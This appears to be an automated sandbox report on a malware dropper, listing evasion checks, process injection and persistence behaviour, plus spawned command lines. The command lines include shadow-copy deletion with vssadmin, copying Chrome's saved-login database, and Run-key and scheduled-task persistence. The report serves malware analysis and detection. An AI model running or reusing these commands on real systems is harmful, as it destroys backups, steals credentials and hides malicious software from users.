N/A N/A N/A N/A

Looks for VirtualBox Guest Additions in registry

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Users\Admin\AppData\Roaming\11.exe N/A

ReZer0 packer

rezer0
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Looks for VMWare Tools registry key

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Users\Admin\AppData\Roaming\11.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\11.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\11.exe N/A

Checks QEMU agent file

Description Indicator Process Target
File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe C:\Users\Admin\AppData\Roaming\3.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\31.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\11.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\feeed = "C:\\Windows\\system32\\pcalua.exe -a C:\\Users\\Admin\\AppData\\Roaming\\feeed.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Dokumen4 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Dibromob\\PRECONCE.vbs" C:\Users\Admin\AppData\Roaming\3.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Roaming\11.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Roaming\11.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3152 set thread context of 1440 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 1440 set thread context of 3368 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Windows\Explorer.EXE
PID 380 set thread context of 2472 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 4528 set thread context of 4024 N/A C:\Users\Admin\AppData\Roaming\11.exe C:\Users\Admin\AppData\Roaming\11.exe
PID 4024 set thread context of 3368 N/A C:\Users\Admin\AppData\Roaming\11.exe C:\Windows\Explorer.EXE
PID 3184 set thread context of 3368 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\Explorer.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\31.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\11.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\12.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NETSTAT.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\REG.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\5.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\8.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\11.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\11.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\5.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1380 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\31.exe C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\31.exe C:\Windows\system32\cmd.exe
PID 4484 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Program Files\Java\jre-1.8\bin\javaw.exe
PID 4484 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Program Files\Java\jre-1.8\bin\javaw.exe
PID 4484 wrote to memory of 3152 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 4484 wrote to memory of 3152 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 4484 wrote to memory of 3152 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 4484 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 4484 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 4484 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 4484 wrote to memory of 5004 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 4484 wrote to memory of 5004 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 4484 wrote to memory of 5004 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 4484 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\5.exe
PID 4484 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\5.exe
PID 4484 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\5.exe
PID 3152 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 3152 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 3152 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 4484 wrote to memory of 4480 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\6.exe
PID 4484 wrote to memory of 4480 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\6.exe
PID 4484 wrote to memory of 4480 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\6.exe
PID 3368 wrote to memory of 3184 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NETSTAT.EXE
PID 3368 wrote to memory of 3184 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NETSTAT.EXE
PID 3368 wrote to memory of 3184 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NETSTAT.EXE
PID 4484 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\7.exe
PID 4484 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\7.exe
PID 4484 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\7.exe
PID 4484 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\8.exe
PID 4484 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\8.exe
PID 4484 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\8.exe
PID 4484 wrote to memory of 4932 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\9.exe
PID 4484 wrote to memory of 4932 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\9.exe
PID 4484 wrote to memory of 4932 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\9.exe
PID 4572 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Roaming\8.exe C:\Windows\SysWOW64\cmd.exe
PID 4572 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Roaming\8.exe C:\Windows\SysWOW64\cmd.exe
PID 4572 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Roaming\8.exe C:\Windows\SysWOW64\cmd.exe
PID 4484 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\10.exe
PID 4484 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\10.exe
PID 4484 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\10.exe
PID 4484 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\11.exe
PID 4484 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\11.exe
PID 4484 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\11.exe
PID 3184 wrote to memory of 4768 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 3184 wrote to memory of 4768 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 3184 wrote to memory of 4768 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 4484 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\12.exe
PID 4484 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\12.exe
PID 4484 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\12.exe
PID 2392 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2392 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2392 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 3800 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3368 wrote to memory of 3800 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 380 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 380 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 380 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 380 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 3368 wrote to memory of 4556 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\msdt.exe
PID 3368 wrote to memory of 4556 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\msdt.exe
PID 3800 wrote to memory of 1320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\pcalua.exe
PID 3800 wrote to memory of 1320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\pcalua.exe
PID 4528 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Roaming\11.exe C:\Windows\SysWOW64\schtasks.exe
PID 4528 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Roaming\11.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\31.exe

"C:\Users\Admin\AppData\Local\Temp\31.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6A72.tmp\6A73.tmp\6A74.bat C:\Users\Admin\AppData\Local\Temp\31.exe"

C:\Program Files\Java\jre-1.8\bin\javaw.exe

"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\1.jar"

C:\Users\Admin\AppData\Roaming\2.exe

C:\Users\Admin\AppData\Roaming\2.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Roaming\4.exe

C:\Users\Admin\AppData\Roaming\4.exe

C:\Users\Admin\AppData\Roaming\5.exe

C:\Users\Admin\AppData\Roaming\5.exe

C:\Users\Admin\AppData\Roaming\6.exe

C:\Users\Admin\AppData\Roaming\6.exe

C:\Users\Admin\AppData\Roaming\2.exe

C:\Users\Admin\AppData\Roaming\2.exe

C:\Windows\SysWOW64\NETSTAT.EXE

"C:\Windows\SysWOW64\NETSTAT.EXE"

C:\Users\Admin\AppData\Roaming\7.exe

C:\Users\Admin\AppData\Roaming\7.exe

C:\Users\Admin\AppData\Roaming\8.exe

C:\Users\Admin\AppData\Roaming\8.exe

C:\Users\Admin\AppData\Roaming\9.exe

C:\Users\Admin\AppData\Roaming\9.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"

C:\Users\Admin\AppData\Roaming\10.exe

C:\Users\Admin\AppData\Roaming\10.exe

C:\Users\Admin\AppData\Roaming\11.exe

C:\Users\Admin\AppData\Roaming\11.exe

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\2.exe"

C:\Users\Admin\AppData\Roaming\12.exe

C:\Users\Admin\AppData\Roaming\12.exe

C:\Windows\SysWOW64\reg.exe

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\system32\pcalua.exe -a C:\Users\Admin\AppData\Roaming\feeed.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\Dibromob\PRECONCE.vbs

C:\Windows\system32\pcalua.exe

C:\Windows\system32\pcalua.exe -a C:\Users\Admin\AppData\Roaming\feeed.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp99A0.tmp"

C:\Users\Admin\AppData\Roaming\11.exe

"{path}"

C:\Windows\SysWOW64\msdt.exe

"C:\Windows\SysWOW64\msdt.exe"

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\4.dll f1 C:\Users\Admin\AppData\Roaming\4.exe@5004

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5004 -ip 5004

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\4.dll,f0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 472

C:\Users\Admin\AppData\Roaming\13.exe

C:\Users\Admin\AppData\Roaming\13.exe

C:\Users\Admin\AppData\Roaming\14.exe

C:\Users\Admin\AppData\Roaming\14.exe

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\11.exe"

C:\Users\Admin\AppData\Roaming\15.exe

C:\Users\Admin\AppData\Roaming\15.exe

C:\Users\Admin\AppData\Roaming\16.exe

C:\Users\Admin\AppData\Roaming\16.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\System32\16.exe

C:\Users\Admin\AppData\Roaming\17.exe

C:\Users\Admin\AppData\Roaming\17.exe

C:\Users\Admin\AppData\Roaming\18.exe

C:\Users\Admin\AppData\Roaming\18.exe

C:\Users\Admin\AppData\Roaming\19.exe

C:\Users\Admin\AppData\Roaming\19.exe

C:\Windows\system32\mode.com

mode con cp select=1251

C:\Users\Admin\AppData\Roaming\13.exe

C:\Users\Admin\AppData\Roaming\13.exe

C:\Windows\System32\16.exe

C:\Windows\System32\16.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.vbs

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe"

C:\Users\Admin\AppData\Roaming\20.exe

C:\Users\Admin\AppData\Roaming\20.exe

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\18.exe"

C:\Users\Admin\AppData\Roaming\21.exe

C:\Users\Admin\AppData\Roaming\21.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4792 -ip 4792

C:\Users\Admin\AppData\Roaming\feeed.exe

"C:\Users\Admin\AppData\Roaming\feeed.exe"

C:\Users\Admin\AppData\Roaming\22.exe

C:\Users\Admin\AppData\Roaming\22.exe

C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe

"C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wWTxgR" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF6F3.tmp"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 612

C:\Users\Admin\AppData\Roaming\21.exe

"{path}"

C:\Users\Admin\AppData\Roaming\21.exe

"{path}"

C:\Users\Admin\AppData\Roaming\23.exe

C:\Users\Admin\AppData\Roaming\23.exe

C:\Users\Admin\AppData\Roaming\24.exe

C:\Users\Admin\AppData\Roaming\24.exe

C:\Users\Admin\AppData\Roaming\9.exe

"{path}"

C:\Users\Admin\AppData\Roaming\9.exe

"{path}"

C:\Users\Admin\AppData\Roaming\20.exe

C:\Users\Admin\AppData\Roaming\20.exe

C:\Program Files (x86)\Internet Explorer\ielowutil.exe

"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Users\Admin\AppData\Roaming\25.exe

C:\Users\Admin\AppData\Roaming\25.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Users\Admin\AppData\Roaming\26.exe

C:\Users\Admin\AppData\Roaming\26.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe

"C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:10552 CREDAT:17410 /prefetch:2

C:\Users\Admin\AppData\Roaming\27.exe

C:\Users\Admin\AppData\Roaming\27.exe

C:\Users\Admin\AppData\Roaming\24.exe

"{path}"

C:\Users\Admin\AppData\Roaming\28.exe

C:\Users\Admin\AppData\Roaming\28.exe

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe

"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"

C:\Users\Admin\AppData\Roaming\15.exe

C:\Users\Admin\AppData\Roaming\15.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Program Files (x86)\Kudftrf0\jjli4n.exe

C:\Users\Admin\AppData\Roaming\29.exe

C:\Users\Admin\AppData\Roaming\29.exe

C:\Windows\SysWOW64\cmd.exe

/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V

C:\Users\Admin\AppData\Roaming\30.exe

C:\Users\Admin\AppData\Roaming\30.exe

C:\Program Files (x86)\Uftg\nnennq.exe

"C:\Program Files (x86)\Uftg\nnennq.exe"

C:\Program Files (x86)\Uftg\nnennq.exe

"C:\Program Files (x86)\Uftg\nnennq.exe"

C:\Users\Admin\AppData\Roaming\31.exe

C:\Users\Admin\AppData\Roaming\31.exe

C:\Windows\SysWOW64\raserver.exe

"C:\Windows\SysWOW64\raserver.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

C:\Users\Admin\AppData\Roaming\25.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

C:\Users\Admin\AppData\Roaming\25.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Program Files (x86)\Jprfxr\xdclkzixuh8.exe

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"

C:\Windows\System32\mshta.exe

